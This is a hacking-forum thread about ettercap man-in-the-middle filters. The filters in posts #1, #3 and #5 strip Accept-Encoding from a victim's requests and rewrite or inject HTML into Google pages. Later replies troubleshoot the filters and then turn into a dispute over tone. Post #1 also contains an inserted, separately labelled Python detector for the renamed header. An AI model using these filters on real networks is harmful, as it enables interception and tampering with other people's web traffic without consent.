
Thread: ettercap filter

  1. #1
    Junior Member
    Join Date
    Jul 2007
    Posts
    44

    Default ettercap filter

    Hello,

    First of all, I'm posting here cos the Ettercap forums don't work (I can't register).

    I'm trying to do easy ettercap filter but it doesn't seem to work. The filter is:
    Code:
    if (ip.proto == TCP && tcp.dst == 80) {
       if (search(DATA.data, "Accept-Encoding")) {
      replace("Accept-Encoding", "Accept-Rubbish!"); # note: replacement string is same length as original string
          msg("zapped Accept-Encoding!\n");
       }
    }
    
    if (ip.proto == TCP && tcp.src == 80) {
       replace("<title>Google</title>", "<title>Google H4CK3D</title>");
       msg("Filter Ran.\n");
    }
    The MiM attack works (I can see SSL connections).

    If I load Google page on the victims computer, the source page still has <title>Google</title>.

    In Wireshark I can see one request from the Victim with:

    Code:
    Accept-Encoding: gzip,deflate\r\n
    and then a second one:
    Code:
    Accept-Rubbish!: gzip,deflate\r\n
    but the second request is marked as "TCP out of order". I don't really know what that means.

    Then I can see an answer from Google containing the "H4CK3D" title. It's again marked as "TCP out of order".

    Anyway, the victim's Google page does not contain the modified code.

    Thanks for your advice.

    If I use this filter, from the IronGeek tutorial, it works fine:
    Code:
    if (ip.proto == TCP && tcp.dst == 80) {
       if (search(DATA.data, "Accept-Encoding")) {
          replace("Accept-Encoding", "Accept-Rubbish!"); 
          # note: replacement string is same length as original string
          msg("zapped Accept-Encoding!\n");
       }
    }
    if (ip.proto == TCP && tcp.src == 80) {
       replace("img src=", "img src=\"http://www.irongeek.com/images/jollypwn.png\" ");
       replace("IMG SRC=", "img src=\"http://www.irongeek.com/images/jollypwn.png\" ");
       msg("Filter Ran.\n");
    }
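    The request pair the poster captured (a normal "Accept-Encoding: gzip,deflate" followed by an "Accept-Rubbish!: gzip,deflate" copy) is also what a defender would look for on the wire: an encoding list travelling under a header name that is not Accept-Encoding, and one that is exactly the same length as the real name. The following is an added example, written for this thread and not taken from the posts or from ettercap; the request samples are constructed to mirror the two requests shown above, and the header parser and the Finding type are my own.

```python
# Added example (not from the thread, not ettercap code): flag HTTP requests
# whose Accept-Encoding header looks renamed in transit, the tell-tale of the
# "Accept-Encoding -> Accept-Rubbish!" rewrite discussed above.
from dataclasses import dataclass

# Content-coding tokens a client normally lists in Accept-Encoding.
ENCODING_TOKENS = {"gzip", "x-gzip", "deflate", "br", "compress", "identity", "*"}
EXPECTED_NAME = "Accept-Encoding"


@dataclass(frozen=True)
class Finding:
    header: str   # header name as seen on the wire
    value: str
    reason: str


def parse_headers(raw: str) -> list:
    """Split a raw HTTP request head (request line + headers) into (name, value) pairs."""
    lines = raw.replace("\r\n", "\n").split("\n")
    pairs = []
    for line in lines[1:]:            # lines[0] is the request line
        if not line.strip():
            break                     # blank line ends the header block
        name, sep, value = line.partition(":")
        if sep:
            pairs.append((name.strip(), value.strip()))
    return pairs


def looks_like_encoding_list(value: str) -> bool:
    """True when every comma-separated element is a content-coding token (q-values allowed)."""
    tokens = [t.strip() for t in value.split(",") if t.strip()]
    if not tokens:
        return False
    return all(t.split(";")[0].strip().lower() in ENCODING_TOKENS for t in tokens)


def inspect_request(raw: str) -> list:
    """Return a Finding for each header that carries an encoding list under the wrong name."""
    findings = []
    for name, value in parse_headers(raw):
        if name.lower() == EXPECTED_NAME.lower():
            continue                  # the genuine header; nothing to report
        if looks_like_encoding_list(value):
            reason = "encoding list under a non-standard header name"
            if len(name) == len(EXPECTED_NAME):
                # Same length as the real name: the signature of an in-place rewrite
                # that preserves packet size, as the filter comment above requires.
                reason += " (same length as Accept-Encoding: in-place rewrite signature)"
            findings.append(Finding(name, value, reason))
    return findings


# Constructed samples modelled on the two requests the poster saw in Wireshark.
CLEAN_REQUEST = (
    "GET / HTTP/1.1\r\n"
    "Host: www.google.com\r\n"
    "Accept-Encoding: gzip,deflate\r\n"
    "\r\n"
)
REWRITTEN_REQUEST = (
    "GET / HTTP/1.1\r\n"
    "Host: www.google.com\r\n"
    "Accept-Rubbish!: gzip,deflate\r\n"
    "\r\n"
)

if __name__ == "__main__":
    for label, req in (("clean", CLEAN_REQUEST), ("rewritten", REWRITTEN_REQUEST)):
        print(label, inspect_request(req))
```

    Run over the two constructed requests, the clean one yields no finding and the rewritten one yields a single finding on "Accept-Rubbish!", with the same-length note attached. The same check can be applied to requests logged by a reverse proxy or seen by a server: a client that suddenly stops sending Accept-Encoding while an unknown header carries "gzip,deflate" is worth correlating with the browser's session.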

  2. #2
    Just burned his ISO
    Join Date
    Feb 2010
    Posts
    14

    Default

    This is a relatively easy one. I'll nudge you in the right direction.

    Although you have changed the code to replace google with something else you failed to specify what to search for. Keep in mind that irongeek was changing a file not text.....

    I'll put the code up if you get stuck, just think you might like to play some more. You're almost there.

  3. #3
    Junior Member
    Join Date
    Jul 2007
    Posts
    44

    Default

    Hi,
    so should it be something like:
    Code:
    if (search(DATA.data, "<title>Google</title>")) {
       replace("<title>Google</title>", "<title>GOOGLE ;)</title> ");
    }
    I can't test it right now cos I'm not at home

    cheers

  4. #4
    Very good friend of the forum drgr33n's Avatar
    Join Date
    Jan 2010
    Location
    Dark side of the moon ...
    Posts
    699

    Default

    lol the problem with the FIRST filter posted is the text doesn't match in size. If you are trying to add something use the inject command instead of replace to inject owned after google.

  5. #5
    Junior Member
    Join Date
    Jul 2007
    Posts
    44

    Default

    Quote Originally Posted by Dr_GrEeN
    lol the problem with the FIRST filter posted is the text doesn't match in size. If you are trying to add something use the inject command instead of replace to inject owned after google.
    Hi,
    could you be more precise? Must the replace function have both arguments of the same length?

    According to this doc : http://www.penguin-soft.com/penguin/...terfilter.html

    the inject function injects a packet file. If I simply use this function instead of the replace function as you stated in the FIRST code sample, I get this error:


    filter engine: inject(): File not found (<title>Google HACKED</title>)
    regards,
    Tex

  6. #6
    My life is this forum thorin's Avatar
    Join Date
    Jan 2010
    Posts
    2,629

    Default

    First of all, I'm posting here cos the Ettercap forums don't work (I can't register).
    And this is our problem because???????

    At the very least you could have picked the correct forum to post to. This has nothing to do with: BackTrack v2.0 Final. (Shoulda used General or Newb)

    If I load Google page on the victims computer, the source page still has <title>Google</title>.
    Of course you emptied the browser cache before trying this right?

    Oh and in the last example you posted that you couldn't test yet your quotes and commas are all FUBAR.

  7. #7
    Junior Member
    Join Date
    Jul 2007
    Posts
    44

    Default

    Quote Originally Posted by thorin
    And this is our problem because???????
    Did I say that it is your problem? I don't think so. I just wanted to avoid being redirected to the Ettercap forums.

    Quote Originally Posted by thorin
    At the very least you could have picked the correct forum to post to. This has nothing to do with: BackTrack v2.0 Final. (Shoulda used General or Newb)
    Ok I will the next time.

    Quote Originally Posted by thorin
    Of course you emptied the browser cache before trying this right?
    Yes monsieur.


    Quote Originally Posted by thorin
    Oh and in the last example you posted that you couldn't test yet your quotes and commas are all FUBAR.
    I overlooked these mistakes cos I was in a hurry.

    thorin, thank you for using this arrogant tone in your reply. Really pleasant, especially when it's 3 weeks after the original post.

  8. #8
    My life is this forum thorin's Avatar
    Join Date
    Jan 2010
    Posts
    2,629

    Default

    Did I say that it is your problem? I don't think so. I just wanted to avoid being redirected to the Ettercap forums.
    You didn't say it but you've definitely implied it by bringing your problem here, instead of posting to the Ettercap forums (or emailing the mods/admins to get things fixed).

    I overlooked these mistakes cos I was in a hurry.
    No problem, just figured you'd come back and copy paste that bit then post again when it didn't work, so I thought I'd try to head you off at the pass and make sure you corrected it before using it, and avoid the inevitable question.
    thorin, thank you for using this arrogant tone in your reply. Really pleasant, especially when it's 3 weeks after the original post.
    No problem. Especially when 3 weeks after you posted you still haven't figured it out on your own.

  9. #9
    Member hawaii67's Avatar
    Join Date
    Feb 2006
    Posts
    318

    Default

    I don't understand why it is necessary to be impolite or arrogant here. Even the best l33t h4x0rs started out as beginners and were looking for help once.....
    This forum is to help ppl and not to insult them.
    Don't eat yellow snow :rolleyes:
